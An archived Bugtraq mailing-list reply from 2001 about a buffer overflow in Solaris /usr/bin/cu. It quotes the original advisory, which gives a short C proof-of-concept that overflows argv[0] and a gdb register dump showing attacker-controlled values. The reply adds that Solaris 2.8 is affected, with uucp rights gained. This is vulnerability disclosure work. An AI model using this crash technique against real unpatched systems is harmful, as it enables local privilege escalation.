Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Solaris /usr/bin/cu Vulnerability

From: Tomas Cibulka <shock () HQ ALERT SK>
Date: Thu, 18 Jan 2001 20:19:10 +0100
HI

 solaris 2.8 seems to be also affected by this bug.
 But U can gain only uucp rights in default instalation.

                        bye


On Wed, Jan 17, 2001 at 04:34:52PM -0300, Pablo Sor wrote:

Description

The /usr/bin/cu command contains a buffer overflow, the problem occurs
when
it copy his own name ( argv[0] ) to an internal variable without
checking
out its lenght and this causes the overflow.

Vulnerable Versions

Sun Solaris 2.4
Sun Solaris 2.5
Sun Solaris 2.5.1
Sun Solaris 2.6
Sun Solaris 2.7

(Dont know about Solaris 2.8)

Technical Description

#include <stdio.h>

void main(int argc,char **argv)
{
char *buf;

buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/usr/bin/cu",buf,(char *)0);
}

$ uname -a
SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5

$ ./cu-demo 4000
Segmentation Fault (core dumped)

$ gdb ./cu-demo --core=core

GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "sparc-sun-solaris2.5.1"...
warning: core file may not match specified executable file.
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
#0  0xef62901c in ?? ()
(gdb) info registers
g0             0x0      0
g1             0xef628d24       -278754012
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x137a4  79780
o1             0xef792a88       -277271928
o2             0x0      0
o3             0x0      0
o4             0x0      0
o5             0xef792a88       -277271928
sp             0xefffecb0       -268440400
o7             0x31b48  203592
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x81010100       -2130640640
l6             0x7      7
l7             0xef7927d4       -277272620
i0             0x39000  233472
i1             0xeffffec4       -268435772
i2             0x38088  229512
i3             0x41414141       1094795585
i4             0x2f     47
i5             0x0      0
fp             0xefffecf0       -268440336
i7             0x137a4  79780
y              0x0      0
psr            0x4400086        71303302
wim            0x0      0
tbr            0x0      0
pc             0xef62901c       -278753252
npc            0xef628ffc       -278753284
fpsr           0x0      0
cpsr           0x0      0


Pablo Sor
psor () afip gov ar


--
------------------------------------------------------------------------
     /|     Tomas Cibulka
   'o.O'
   =(___)=  E-MAIL :     shock () alert sk
      U     URL : hq.alert.sk/~shock  -tott moja www page
            PGP KEY : finger shock () hq alert sk

-----------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: